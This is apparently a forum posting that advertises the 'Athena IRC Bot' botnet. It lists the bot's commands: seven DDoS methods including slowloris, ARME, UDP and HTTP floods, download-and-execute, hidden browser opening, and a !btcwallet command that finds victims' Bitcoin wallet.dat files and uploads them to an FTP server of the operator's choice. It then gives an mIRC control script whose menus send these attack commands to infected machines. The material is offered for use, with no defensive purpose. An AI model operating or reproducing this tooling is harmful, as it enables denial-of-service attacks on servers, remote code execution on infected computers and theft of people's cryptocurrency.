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Athena IRC Bot ( C++ ) || v1.77 || 7 advanced DDOS methods || BTC wallet.dat Stealer

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Athena IRC Bot ( C++ ) || v1.77 || 7 advanced DDOS methods || BTC wallet.dat Stealer
DDoS Commands
[Port 80 is most common for websites]
!udp - Sends mass amounts of random packets to target host/ip, perfect for home connections(SYNTAX: !udp host/ip port time)[Use '0' to flood random ports]
!condis - Rapid connect/disconnect flood, it takes down gaming(ie. CSS) and teamspeak/VoiP servers like gravy(SYNTAX: !condis host/ip port time)
!httpget - Rapidly sends hundreds of HTTP GET requests every second from each bot(SYNTAX: !httpget website.com/directory/index.php port time)[a specific directory/file is optional]
!httppost - Makes hundreds of HTTP POST requests from each bot, and holds connection by slowly posting content(SYNTAX: !httppost host/ip port time)
!slowloris - Connects to a webserver through several hundred sockets per bot, and sits on it.(SYNTAX: !slowloris website.com/directory/index.php port time)[a specific directory/file is optional]
!arme - Exploits a vulnerability in Apache that crashes servers though many bulk partial headers requests at once causing a lot of memory to swap to the remote filesystem.(SYNTAX: !arme website.com/directory/index.php port time)[a specific directory/file is optional]
!httpcombo - Sends organized attacks of ARME, Slowloris, Slow HTTP POST, and Rapid HTTP GET concurrently to a specified target(SYNTAX: !httpcombo website.com port time)

Misc. Bot Commands
!id - Displays the version of the bot and who it is licensed to
!ping - Returns bot's ping time to its current connection
!openurl - Opens a webpage in the default browser(SYNTAX: !openurl http://website.com)
!openurlhidden - Opens a webpage hidden in Internet Explorer(SYNTAX: !openurlhidden http://website.com)
!urlblock - Creates a line in the computer hosts file that disallows access to a specified host(SYNTAX: !urlblock website.com)
!dlexec - Downloads and executes a file from a URL(SYNTAX: !dlexec http://website.com/program.exe)
!update - Downloads and executes a given link. The bot will uninstall after successful execution(SYNTAX: !update website.com/file.exe)
!remove - Uninstalls the bot and deletes any traces of itself

!btcwallet - Scans bot computer for wallet.dat(BTC wallet) and uploads it to an FTP of your choice(SYNTAX: !btcwallet ftphost.com user123 pass123)

IRC Commands
!raw - Sends raw commands to the server(SYNTAX: !raw PRIVMSG #channel :message)
!silent on/off - Toggles bot output(overridden by the !raw command)
!join - Joins bot to a channel(SYNTAX: !join #channel)
!part - Parts bot from a channel(SYNTAX: !part #channel)
!newnick - Changes bot nickname using a new random number and name
!reconnect - Attempts to reconnect to the current IRC server/network and channel after disconnecting for 10 seconds

Бот для IRC
;Athena mIRC Scripts
on *:LOAD: {
on *:CONNECT: {
alias Athena {
echo -a 3Setting necessary variables for 11*10Athena11*
set %CCchannel #channel
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
menu channel {
.Version/ID:/msg %CCchannel !id
.Bot Computer
..Open URL:{
%botVar = $$?="URL[http://website.com]:"
msg %CCchannel !openurl %botVar
set %botVar NULL
..Open URL[hidden]:{
%botVar = $$?="URL[http://website.com]:"
msg %CCchannel !openurlhidden %botVar
set %botVar NULL
..Download + Execute:{
%botVar = $$?="Full URL[http://website.com/program.exe]:"
msg %CCchannel !dlexec %botVar
set %botVar NULL
%botVar = $$?="URL[http://website.com/program.exe]:"
msg %CCchannel !update %botVar
set %botVar NULL
..Rapid HTTP GET:{
%botVar = $$?="Hostname/IP + extention (Example: website.com/directory/index.php):"
%botVar2 = $$?="Port(80 is most common for HTTP):"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !httpget %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
..Slow HTTP POST:{
%botVar = $$?="Hostname/IP:"
%botVar2 = $$?="Port(80 is most common for HTTP):"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !httppost %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
%botVar = $$?="Hostname/IP + extention (Example: website.com/directory/index.php):"
%botVar2 = $$?="Port(80 is most common for HTTP):"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !slowloris %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
..ARME[Apache Remote Memory Exhaustion]:{
%botVar = $$?="Hostname/IP + extention (Example: website.com/directory/index.php):"
%botVar2 = $$?="Port(80 is most common for HTTP):"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !arme %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
..HTTP Combo:{
%botVar = $$?="Hostname/IP (Example: website.com):"
%botVar2 = $$?="Port(80 is most common for HTTP):"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !httpcombo %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
%botVar = $$?="Hostname/IP:"
%botVar2 = $$?="Port:"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !udp %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
..Rapid Connect/Disconnect[gaming/voip/teamviewer servers]:{
%botVar = $$?="Hostname/IP:"
%botVar2 = $$?="Port:"
%botVar3 = $$?="Length of DDoS[seconds]:"
msg %CCchannel !condis %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
.IRC Commands
..Silent on:{
msg %CCchannel !silent on
MODE %CCchannel +m
..Silent off:{
msg %CCchannel !silent off
MODE %CCchannel -m
..New Nickname:/msg %CCchannel !newnick
..Send raw command to IRC:{
%botVar = $$?="Raw Command:"
msg %CCchannel !raw %botVar
set %botVar NULL
%botVar = $$?="Target Channel/User:"
%botVar2 = $$?="Message:"
msg %CCchannel !raw PRIVMSG %botVar :%botVar2
set %botVar NULL
set %botVar2 NULL
%botVar = $$?="Target Channel/User:"
%botVar2 = $$?="Message:"
msg %CCchannel !raw NOTICE %botVar :%botVar2
set %botVar NULL
set %botVar2 NULL
%botVar = $$?="Target Channel:"
msg %CCchannel !join %botVar
set %botVar NULL
%botVar = $$?="Target Channel:"
msg %CCchannel !part %botVar
set %botVar NULL
%botVar = $$?="Target Channel:"
%botVar2 = $$?="Message:"
msg %CCchannel !raw KNOCK %botVar %botVar2
set %botVar NULL
set %botVar2 NULL
..Bitcoin wallet.dat:{
%botVar = $$?="FTP Hostname/IP:"
%botVar2 = $$?="FTP Username:"
%botVar3 = $$?="FTP Password:"
msg %CCchannel !btcwallet %botVar %botVar2 %botVar3
set %botVar NULL
set %botVar2 NULL
set %botVar3 NULL
.Ping bots:/msg %CCchannel !ping
.Reconnect Bots:/msg %CCchannel !reconnect
.Remove Bots:{
set %botVar $?="Are you sure you want to delete all of the bots in channel $CCchannel? (yes/no)"
if (%botVar == yes) {
msg %CCchannel !remove
set %botVar NULL
elseif (%botVar == no) {
echo -a Removed no bots
set %botVar NULL
else {
echo -a You typed %botVar instead of 'yes' or 'no'
set %botVar NULL

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